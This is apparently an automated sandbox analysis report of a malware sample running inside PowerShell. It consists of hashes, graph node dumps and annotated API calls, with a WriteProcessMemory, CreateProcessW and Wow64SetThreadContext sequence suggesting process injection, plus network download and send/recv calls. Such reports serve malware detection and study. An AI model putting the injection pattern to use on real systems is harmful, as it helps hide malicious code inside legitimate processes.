                                                                                                                  • Snapshot File: hcaresult_7_2_71d0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$$^q$$^q
                                                                                                                  • API String ID: 0-2291298209
                                                                                                                  • Opcode ID: ae60260b30327909ec2b6452485f42f851dac323905031f7840232bda7c28830
                                                                                                                  • Instruction ID: 00cec27a5dd88d1ecc8c05bee89d35e9f70256c10d261ee4f55057079e4db183
                                                                                                                  • Opcode Fuzzy Hash: ae60260b30327909ec2b6452485f42f851dac323905031f7840232bda7c28830
                                                                                                                  • Instruction Fuzzy Hash: B73107F4A043069FDF268E24C811B7A7BA5AF99A54F59806AE400DB1D1EB75CE40CF72

                                                                                                                  Control-flow Graph

                                                                                                                  (graph omitted: rendered CFG with Executed / Not Executed node legend; the raw node-edge dump for basic blocks 71d1381-71d17f2 carries no API annotations and is not reproduced)
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2068080135.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_71d0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$$^q$$^q
                                                                                                                  • API String ID: 0-2291298209
                                                                                                                  • Opcode ID: 89eba0f9d421cd8e91196bc7e261f15d6e4c39dc60c47eae543fd373edbe191e
                                                                                                                  • Instruction ID: 134752d6cbc8f7802707a0466335615068f42049120236655ebf00ac951bb98b
                                                                                                                  • Opcode Fuzzy Hash: 89eba0f9d421cd8e91196bc7e261f15d6e4c39dc60c47eae543fd373edbe191e
                                                                                                                  • Instruction Fuzzy Hash: 8131C4B0A0030EFFCB2A8F19C5486A577F5AF42620F1B85A6D8158B1D2E734CD45EF62

                                                                                                                  Control-flow Graph

                                                                                                                  (graph omitted: rendered CFG with Executed / Not Executed node legend; in the raw dump, basic block cad248-cad281 is annotated with the WriteProcessMemory call listed under APIs below)
                                                                                                                  APIs
                                                                                                                  • WriteProcessMemory.KERNELBASE(?,00000000,00000000,1A5A789D,00000000,?,?,?,195035B0,00000000,?,00CAC383,?,00000000,?), ref: 00CAD274
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2024462818.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ca0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3559483778-0
                                                                                                                  • Opcode ID: 881d352705896f89074354e529bb37f660fdce77b34817cc05ea4eb54c3bab2d
                                                                                                                  • Instruction ID: c3c112f6e248c038b185e2289b46ac85480fa0ca21af576570ecbf250b1720a4
                                                                                                                  • Opcode Fuzzy Hash: 881d352705896f89074354e529bb37f660fdce77b34817cc05ea4eb54c3bab2d
                                                                                                                  • Instruction Fuzzy Hash: FB3139B58053899FCB11CFA9C844ADEBFF8FF4A320F04849AE554E7251C778A944CBA5

                                                                                                                  Control-flow Graph

                                                                                                                  (graph omitted: rendered CFG with Executed / Not Executed node legend; in the raw dump, basic block cacaf4-cacb97 is annotated with the CreateProcessW call listed under APIs below)
                                                                                                                  APIs
                                                                                                                  • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 00CACB84
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2024462818.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ca0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 963392458-0
                                                                                                                  • Opcode ID: ec4f3ffdcdbb8dac72d505061b77772b64f22857237dc4677620a99aa79dfea6
                                                                                                                  • Instruction ID: 63666496e41b4a10120cb976c0f6a4126df06f72c95f6d91c641a74a7b783646
                                                                                                                  • Opcode Fuzzy Hash: ec4f3ffdcdbb8dac72d505061b77772b64f22857237dc4677620a99aa79dfea6
                                                                                                                  • Instruction Fuzzy Hash: 50512A71D0125ADFDB24CFA9C980BDDBBB5BF49314F0085AAE909B7240DB759A84CF60

                                                                                                                  Control-flow Graph

                                                                                                                  (graph omitted: rendered CFG with Executed / Not Executed node legend; in the raw dump, basic block cacaf4-cacb97 is annotated with the CreateProcessW call listed under APIs below)
                                                                                                                  APIs
                                                                                                                  • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 00CACB84
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2024462818.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ca0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 963392458-0
                                                                                                                  • Opcode ID: 673ab1cfe77e30e14f10a8bc9603eb49ce929f2b0412a5767691344e247eaffc
                                                                                                                  • Instruction ID: f9f92239feb2492bbc6d2bbf35218caf4ba3cb6c80d8be7a12d00aee6b7705a9
                                                                                                                  • Opcode Fuzzy Hash: 673ab1cfe77e30e14f10a8bc9603eb49ce929f2b0412a5767691344e247eaffc
                                                                                                                  • Instruction Fuzzy Hash: 7E512971D0121ADFDB24CF59C980BDDBBB5BF49314F1085AAE909B7240DB759A88CF90

                                                                                                                  Control-flow Graph

                                                                                                                  (graph omitted: rendered CFG with Executed / Not Executed node legend; in the raw dump, basic block cad248-cad281 is annotated with the WriteProcessMemory call listed under APIs below)
                                                                                                                  APIs
                                                                                                                  • WriteProcessMemory.KERNELBASE(?,00000000,00000000,1A5A789D,00000000,?,?,?,195035B0,00000000,?,00CAC383,?,00000000,?), ref: 00CAD274
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2024462818.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ca0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3559483778-0
                                                                                                                  • Opcode ID: 371ca979ca5e2619428836e179fe24a6aa8af97d9323b680aad2f65f09a6a8a2
                                                                                                                  • Instruction ID: c0c264f52996f6bcce60504d9d095c5af4e1c40b60ca09d1d8b4027316300a53
                                                                                                                  • Opcode Fuzzy Hash: 371ca979ca5e2619428836e179fe24a6aa8af97d9323b680aad2f65f09a6a8a2
                                                                                                                  • Instruction Fuzzy Hash: B82109B1900309DFCB10CF9AC944BDEBBF4FB49324F508529E519A7600D374A944CF65

                                                                                                                  Control-flow Graph

                                                                                                                  (graph omitted: rendered CFG with Executed / Not Executed node legend; in the raw dump, basic block cacccc-caccf8 is annotated with the Wow64SetThreadContext call listed under APIs below)
                                                                                                                  APIs
                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,195035B0,?,?,00CAC05A), ref: 00CACCEB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2024462818.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ca0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 983334009-0
                                                                                                                  • Opcode ID: a5b79d76734d28e0700efc75e81ed25d41e21745410eb3f32c9f04df511609cd
                                                                                                                  • Instruction ID: e267e7de0dfbc13f59841e7254bfa283f8e44732d36f7d665e376f8b59da3c82
                                                                                                                  • Opcode Fuzzy Hash: a5b79d76734d28e0700efc75e81ed25d41e21745410eb3f32c9f04df511609cd
                                                                                                                  • Instruction Fuzzy Hash: B51129B1D0034A8FCB10DF9AC884BDEFBF4EB89324F148029D418A3600D778A545CFA5

                                                                                                                  Control-flow Graph

                                                                                                                  (graph omitted: rendered CFG with Executed / Not Executed node legend; in the raw dump, basic block cacccc-caccf8 is annotated with the Wow64SetThreadContext call listed under APIs below)
                                                                                                                  APIs
                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,195035B0,?,?,00CAC05A), ref: 00CACCEB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2024462818.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ca0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 983334009-0
                                                                                                                  • Opcode ID: 0a357e1a4df870da4a9a73aaa2445c12a8f69b48301a822e3eb725dde3a448e4
                                                                                                                  • Instruction ID: e7ae6dc7d43b2289f820c997de92e0870097baa9f7e1fa2d9913fca109100c1b
                                                                                                                  • Opcode Fuzzy Hash: 0a357e1a4df870da4a9a73aaa2445c12a8f69b48301a822e3eb725dde3a448e4
                                                                                                                  • Instruction Fuzzy Hash: E61137B2D0034A8FCB10DF9AC984BDEFBF4EB89324F148029E418A3600D778A545CFA5

                                                                                                                  Control-flow Graph

                                                                                                                  (graph omitted: rendered CFG with Executed / Not Executed node legend; in the raw dump, basic block cacccc-caccf8 is annotated with the Wow64SetThreadContext call listed under APIs below)
                                                                                                                  APIs
                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,195035B0,?,?,00CAC05A), ref: 00CACCEB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2024462818.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ca0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 983334009-0
                                                                                                                  • Opcode ID: 2dc4c133638febcdf2dd65af03df9048e10ba549190fa9ce7f39ca02e2886798
                                                                                                                  • Instruction ID: d9f254c13f38d83a9d6e43383c5831e8b0b0d33ea21db6b78be273b18dfab836
                                                                                                                  • Opcode Fuzzy Hash: 2dc4c133638febcdf2dd65af03df9048e10ba549190fa9ce7f39ca02e2886798
                                                                                                                  • Instruction Fuzzy Hash: 4C113AB2D1034A8FDB10CF9AC884BDEFBF5EB89324F148529D428A3640D7789545CF65

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 1360 71d1ef9-71d1f3a 1362 71d20b7-71d20d8 1360->1362 1363 71d1f40-71d1f45 1360->1363 1370 71d20da-71d2102 1362->1370 1371 71d2105-71d210d 1362->1371 1364 71d1f5d-71d1f69 1363->1364 1365 71d1f47-71d1f4d 1363->1365 1372 71d1f6f-71d1f72 1364->1372 1373 71d2062-71d206c 1364->1373 1366 71d1f4f 1365->1366 1367 71d1f51-71d1f5b 1365->1367 1366->1364 1367->1364 1370->1371 1375 71d225d-71d22a2 1370->1375 1376 71d210f-71d2115 1371->1376 1377 71d2125-71d2129 1371->1377 1372->1373 1380 71d1f78-71d1f7f 1372->1380 1383 71d206e-71d2077 1373->1383 1384 71d207a-71d2080 1373->1384 1398 71d244c-71d247c 1375->1398 1399 71d22a8-71d22ad 1375->1399 1378 71d2119-71d2123 1376->1378 1379 71d2117 1376->1379 1381 71d212f-71d2133 1377->1381 1382 71d2208-71d2212 1377->1382 1378->1377 1379->1377 1380->1362 1387 71d1f85-71d1f8a 1380->1387 1388 71d2135-71d2146 1381->1388 1389 71d2173 1381->1389 1391 71d2214-71d221d 1382->1391 1392 71d2220-71d2226 1382->1392 1385 71d2086-71d2092 1384->1385 1386 71d2082-71d2084 1384->1386 1394 71d2094-71d20b4 1385->1394 1386->1394 1396 71d1f8c-71d1f92 1387->1396 1397 71d1fa2-71d1fa6 1387->1397 1388->1375 1414 71d214c-71d2151 1388->1414 1393 71d2175-71d2177 1389->1393 1400 71d222c-71d2238 1392->1400 1401 71d2228-71d222a 1392->1401 1393->1382 1403 71d217d-71d2181 1393->1403 1405 71d1f94 1396->1405 1406 71d1f96-71d1fa0 1396->1406 1397->1373 1410 71d1fac-71d1fb0 1397->1410 1425 71d247e-71d249b 1398->1425 1426 71d24b5-71d24bf 1398->1426 1408 71d22af-71d22b5 1399->1408 1409 71d22c5-71d22c9 1399->1409 1402 71d223a-71d225a 1400->1402 1401->1402 1403->1382 1412 71d2187-71d2196 1403->1412 1405->1397 1406->1397 1415 71d22b9-71d22c3 1408->1415 1416 71d22b7 1408->1416 1417 71d22cf-71d22d3 1409->1417 1418 71d23f4-71d23fe 1409->1418 1420 71d1fd0 1410->1420 1421 71d1fb2-71d1fce 1410->1421 1446 71d21ae-71d2205 1412->1446 1447 71d2198-71d219e 1412->1447 
1429 71d2169-71d2171 1414->1429 1430 71d2153-71d2159 1414->1430 1415->1409 1416->1409 1423 71d22d5-71d22e6 1417->1423 1424 71d2313 1417->1424 1431 71d240c-71d2412 1418->1431 1432 71d2400-71d2409 1418->1432 1427 71d1fd2-71d1fd4 1420->1427 1421->1427 1423->1398 1458 71d22ec-71d22f1 1423->1458 1437 71d2315-71d2317 1424->1437 1459 71d249d-71d24af 1425->1459 1460 71d2505-71d250a 1425->1460 1439 71d24c8-71d24ce 1426->1439 1440 71d24c1-71d24c5 1426->1440 1427->1373 1441 71d1fda-71d1fdd 1427->1441 1429->1393 1442 71d215d-71d2167 1430->1442 1443 71d215b 1430->1443 1433 71d2418-71d2424 1431->1433 1434 71d2414-71d2416 1431->1434 1445 71d2426-71d2449 1433->1445 1434->1445 1437->1418 1450 71d231d-71d2321 1437->1450 1451 71d24d4-71d24e0 1439->1451 1452 71d24d0-71d24d2 1439->1452 1464 71d1fe7 1441->1464 1442->1429 1443->1429 1455 71d21a0 1447->1455 1456 71d21a2-71d21a4 1447->1456 1450->1418 1462 71d2327-71d232b 1450->1462 1463 71d24e2-71d2502 1451->1463 1452->1463 1455->1446 1456->1446 1467 71d2309-71d2311 1458->1467 1468 71d22f3-71d22f9 1458->1468 1459->1426 1460->1459 1462->1418 1469 71d2331-71d2357 1462->1469 1473 71d1fee-71d1ff0 1464->1473 1467->1437 1471 71d22fd-71d2307 1468->1471 1472 71d22fb 1468->1472 1469->1418 1486 71d235d-71d2361 1469->1486 1471->1467 1472->1467 1478 71d2008-71d205f 1473->1478 1479 71d1ff2-71d1ff8 1473->1479 1481 71d1ffc-71d1ffe 1479->1481 1482 71d1ffa 1479->1482 1481->1478 1482->1478 1487 71d2384 1486->1487 1488 71d2363-71d236c 1486->1488 1489 71d2387-71d2394 1487->1489 1490 71d236e-71d2371 1488->1490 1491 71d2373-71d2380 1488->1491 1493 71d239a-71d23f1 1489->1493 1492 71d2382 1490->1492 1491->1492 1492->1489
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2068080135.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_71d0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q
                                                                                                                  • API String ID: 0-1614139903
                                                                                                                  • Opcode ID: 51f684fc62d2c704442e67514d99818671b5cf0b9fa8a25013318d2588c1f126
                                                                                                                  • Instruction ID: 9c392c6073c5dbcb653c35aa8ffda641047b338063cf2893901a06ec8f85d46f
                                                                                                                  • Opcode Fuzzy Hash: 51f684fc62d2c704442e67514d99818671b5cf0b9fa8a25013318d2588c1f126
                                                                                                                  • Instruction Fuzzy Hash: D231B6F1A0530ADFDB25DF29C444BAA7BE1BF45311F1A80A6D1588B291D735DC88CF91
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2068080135.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_71d0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: (o^q
                                                                                                                  • API String ID: 0-74704288
                                                                                                                  • Opcode ID: f4cc534e134a6843dbb16a94f6fa32d8f414e14ea03a999ad561ee6750230179
                                                                                                                  • Instruction ID: 7a4a97ec80e504ef979104facc961af7d5d13ce985426814985b002506b02762
                                                                                                                  • Opcode Fuzzy Hash: f4cc534e134a6843dbb16a94f6fa32d8f414e14ea03a999ad561ee6750230179
                                                                                                                  • Instruction Fuzzy Hash: D131A0B0A0020AEFDB29CE19C944BAA77B1FF49310F158165E5358B1D0D7B1DC94CF91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2024094709.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_a1d000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5e922cec7176829c06a88b268aa0534bdeab1bee0b48ead2b2687fc8d844b9da
                                                                                                                  • Instruction ID: ba7f609bd1fa5fad77fb1773d906edcda55ce8ee0910179a09ad3dec447d7cf3
                                                                                                                  • Opcode Fuzzy Hash: 5e922cec7176829c06a88b268aa0534bdeab1bee0b48ead2b2687fc8d844b9da
                                                                                                                  • Instruction Fuzzy Hash: 80012B714043409AE7104B29CCC4BA7BFE8DF59325F18C429ED4A0B242C7789881C7B1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2024094709.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_a1d000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 35e1f7bfb09d27be882a04a9f58e1129be3e696a55aaac2f2c289a71c9996f48
                                                                                                                  • Instruction ID: 9376d9a7e9918ece4dafe58c2b639ce6b5213bfa2b2ba1973efd91db92859761
                                                                                                                  • Opcode Fuzzy Hash: 35e1f7bfb09d27be882a04a9f58e1129be3e696a55aaac2f2c289a71c9996f48
                                                                                                                  • Instruction Fuzzy Hash: 7001527140E3C09FD7128B258C94B52BFB4DF56225F1980DBD9898F193C2695844C772
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2068080135.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_71d0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                  • API String ID: 0-2049395529
                                                                                                                  • Opcode ID: 554e56b207d06b2486f847f08c7ce318334faf0c35dcfd9302918e5721b03d10
                                                                                                                  • Instruction ID: f5b9a5d9e513d4170d6db0f3742effbe859340586ccc86fe7a322e30e72bdd3b
                                                                                                                  • Opcode Fuzzy Hash: 554e56b207d06b2486f847f08c7ce318334faf0c35dcfd9302918e5721b03d10
                                                                                                                  • Instruction Fuzzy Hash: CC0126A1B0A3854FC72B026C1C245A66FB20BCBA11B1A40DBE140DF2DBCE144D86C7B7

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:4.6%
                                                                                                                  Dynamic/Decrypted Code Coverage:4.4%
                                                                                                                  Signature Coverage:6.2%
                                                                                                                  Total number of Nodes:1605
                                                                                                                  Total number of Limit Nodes:57
                                                                                                                  execution_graph 51419 41d4e0 51420 41d4f6 ctype ___scrt_fastfail 51419->51420 51422 431fa9 21 API calls 51420->51422 51434 41d6f3 51420->51434 51426 41d6a6 ___scrt_fastfail 51422->51426 51423 41d704 51424 41d744 51423->51424 51432 41d770 51423->51432 51436 431fa9 51423->51436 51426->51424 51429 431fa9 21 API calls 51426->51429 51428 41d73d ___scrt_fastfail 51428->51424 51441 43265f 51428->51441 51430 41d6ce ___scrt_fastfail 51429->51430 51430->51424 51433 431fa9 21 API calls 51430->51433 51432->51424 51444 41d484 21 API calls ___scrt_fastfail 51432->51444 51433->51434 51434->51424 51435 41d081 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 51434->51435 51435->51423 51437 431fb3 51436->51437 51438 431fb7 51436->51438 51437->51428 51445 43a89c 51438->51445 51454 43257f 51441->51454 51443 432667 51443->51432 51444->51424 51450 446b0f _strftime 51445->51450 51446 446b4d 51453 445364 20 API calls __dosmaperr 51446->51453 51447 446b38 RtlAllocateHeap 51449 431fbc 51447->51449 51447->51450 51449->51428 51450->51446 51450->51447 51452 442210 7 API calls 2 library calls 51450->51452 51452->51450 51453->51449 51455 432598 51454->51455 51459 43258e 51454->51459 51456 431fa9 21 API calls 51455->51456 51455->51459 51457 4325b9 51456->51457 51457->51459 51460 43294a CryptAcquireContextA 51457->51460 51459->51443 51461 43296b CryptGenRandom 51460->51461 51462 432966 51460->51462 51461->51462 51463 432980 CryptReleaseContext 51461->51463 51462->51459 51463->51462 51464 426040 51469 426107 recv 51464->51469 51470 4260a1 51475 42611e send 51470->51475 51476 425e66 51477 425e7b 51476->51477 51484 425f1b 51476->51484 51478 425f6a 51477->51478 51481 425ec9 51477->51481 51482 425efe 51477->51482 51477->51484 51486 425f35 51477->51486 51489 425fae 51477->51489 51491 425f87 51477->51491 51504 424364 48 API calls ctype 51477->51504 51478->51491 
51508 424b8b 21 API calls 51478->51508 51481->51482 51481->51484 51505 41f085 52 API calls 51481->51505 51482->51484 51482->51486 51506 424364 48 API calls ctype 51482->51506 51486->51478 51486->51484 51507 41f085 52 API calls 51486->51507 51489->51484 51509 4255d7 28 API calls 51489->51509 51491->51484 51491->51489 51492 424f88 51491->51492 51493 424fa7 ___scrt_fastfail 51492->51493 51495 424fb6 51493->51495 51499 424fdb 51493->51499 51510 41e0a7 21 API calls 51493->51510 51495->51499 51503 424fbb 51495->51503 51511 41fae4 45 API calls 51495->51511 51498 424fc4 51498->51499 51513 424195 21 API calls 2 library calls 51498->51513 51499->51489 51501 42505e 51501->51499 51502 431fa9 21 API calls 51501->51502 51502->51503 51503->51498 51503->51499 51512 41cf7e 48 API calls 51503->51512 51504->51481 51505->51481 51506->51486 51507->51486 51508->51491 51509->51484 51510->51495 51511->51501 51512->51498 51513->51499 51514 1000c7a7 51515 1000c7be 51514->51515 51520 1000c82c 51514->51520 51515->51520 51526 1000c7e6 GetModuleHandleA 51515->51526 51516 1000c872 51517 1000c835 GetModuleHandleA 51521 1000c83f 51517->51521 51519 1000c7dd 51519->51520 51519->51521 51523 1000c800 GetProcAddress 51519->51523 51520->51516 51520->51517 51520->51521 51521->51520 51522 1000c85f GetProcAddress 51521->51522 51522->51520 51523->51520 51524 1000c80d VirtualProtect 51523->51524 51524->51520 51525 1000c81c VirtualProtect 51524->51525 51525->51520 51527 1000c7ef 51526->51527 51533 1000c82c 51526->51533 51538 1000c803 GetProcAddress 51527->51538 51529 1000c872 51530 1000c835 GetModuleHandleA 51535 1000c83f 51530->51535 51531 1000c7f4 51532 1000c800 GetProcAddress 51531->51532 51531->51533 51532->51533 51534 1000c80d VirtualProtect 51532->51534 51533->51529 51533->51530 51533->51535 51534->51533 51536 1000c81c VirtualProtect 51534->51536 51535->51533 51537 1000c85f GetProcAddress 51535->51537 51536->51533 51537->51533 51539 1000c82c 51538->51539 51540 1000c80d VirtualProtect 51538->51540 51542 
1000c872 51539->51542 51543 1000c835 GetModuleHandleA 51539->51543 51540->51539 51541 1000c81c VirtualProtect 51540->51541 51541->51539 51545 1000c83f 51543->51545 51544 1000c85f GetProcAddress 51544->51545 51545->51539 51545->51544 51546 43a9a8 51548 43a9b4 _swprintf __FrameHandler3::FrameUnwindToState 51546->51548 51547 43a9c2 51562 445364 20 API calls __dosmaperr 51547->51562 51548->51547 51550 43a9ec 51548->51550 51557 444adc EnterCriticalSection 51550->51557 51552 43a9c7 __fread_nolock __cftof 51553 43a9f7 51558 43aa98 51553->51558 51557->51553 51560 43aaa6 51558->51560 51559 43aa02 51563 43aa1f LeaveCriticalSection std::_Lockit::~_Lockit 51559->51563 51560->51559 51564 448426 36 API calls 2 library calls 51560->51564 51562->51552 51563->51552 51564->51560 51565 414dba 51580 41a52b 51565->51580 51567 414dc3 51590 401fbd 51567->51590 51572 4161f2 51613 401d8c 51572->51613 51575 4161fb 51576 401eea 11 API calls 51575->51576 51577 416207 51576->51577 51578 401eea 11 API calls 51577->51578 51579 416213 51578->51579 51581 41a539 51580->51581 51582 43a89c ___crtLCMapStringA 21 API calls 51581->51582 51583 41a543 InternetOpenW InternetOpenUrlW 51582->51583 51584 41a56c InternetReadFile 51583->51584 51588 41a58f 51584->51588 51585 41a5bc InternetCloseHandle InternetCloseHandle 51587 41a5ce 51585->51587 51587->51567 51588->51584 51588->51585 51589 401eea 11 API calls 51588->51589 51619 401f86 51588->51619 51589->51588 51591 401fcc 51590->51591 51628 402501 51591->51628 51593 401fea 51594 404468 51593->51594 51595 40447b 51594->51595 51633 404be8 51595->51633 51597 404490 ctype 51598 404507 WaitForSingleObject 51597->51598 51599 4044e7 51597->51599 51601 40451d 51598->51601 51600 4044f9 send 51599->51600 51603 404542 51600->51603 51637 42052a 54 API calls 51601->51637 51605 401eea 11 API calls 51603->51605 51604 404530 SetEvent 51604->51603 51606 40454a 51605->51606 51607 401eea 11 API calls 51606->51607 51608 404552 51607->51608 51608->51572 51609 401eea 51608->51609 
51610 4021b9 51609->51610 51611 4021e8 51610->51611 51643 40262e 51610->51643 51611->51572 51614 40200a 51613->51614 51618 40203a 51614->51618 51651 402654 51614->51651 51616 40202b 51654 4026ba 11 API calls _Deallocate 51616->51654 51618->51575 51620 401f8e 51619->51620 51623 402325 51620->51623 51622 401fa4 51622->51588 51624 40232f 51623->51624 51626 40233a 51624->51626 51627 40294a 28 API calls 51624->51627 51626->51622 51627->51626 51629 40250d 51628->51629 51630 40252b 51629->51630 51632 40261a 28 API calls 51629->51632 51630->51593 51632->51630 51634 404bf0 51633->51634 51638 404c0c 51634->51638 51636 404c06 51636->51597 51637->51604 51639 404c16 51638->51639 51641 404c21 51639->51641 51642 404d07 28 API calls 51639->51642 51641->51636 51642->51641 51646 402bee 51643->51646 51645 40263b 51645->51611 51647 402bfb 51646->51647 51648 402c08 error_info_injector 51646->51648 51650 4015d8 11 API calls _Deallocate 51647->51650 51648->51645 51650->51648 51655 402c1a 51651->51655 51654->51618 51658 403340 51655->51658 51660 403348 51658->51660 51659 402662 51659->51616 51660->51659 51662 4038c2 51660->51662 51665 4038cb 51662->51665 51666 401eea 11 API calls 51665->51666 51667 4038ca 51666->51667 51667->51660 51668 42ea2e 51669 42ea39 51668->51669 51670 42ea4d 51669->51670 51672 431fd3 51669->51672 51673 431fe2 51672->51673 51674 431fde 51672->51674 51676 43fcea 51673->51676 51674->51670 51677 44b9ce 51676->51677 51678 44b9e6 51677->51678 51679 44b9db 51677->51679 51681 44b9ee 51678->51681 51687 44b9f7 _strftime 51678->51687 51695 446b0f 21 API calls 3 library calls 51679->51695 51689 446ad5 51681->51689 51683 44ba21 RtlReAllocateHeap 51685 44b9e3 51683->51685 51683->51687 51684 44b9fc 51696 445364 20 API calls __dosmaperr 51684->51696 51685->51674 51687->51683 51687->51684 51697 442210 7 API calls 2 library calls 51687->51697 51690 446ae0 RtlFreeHeap 51689->51690 51694 446b09 __dosmaperr 51689->51694 51691 446af5 51690->51691 51690->51694 51698 445364 20 API calls 
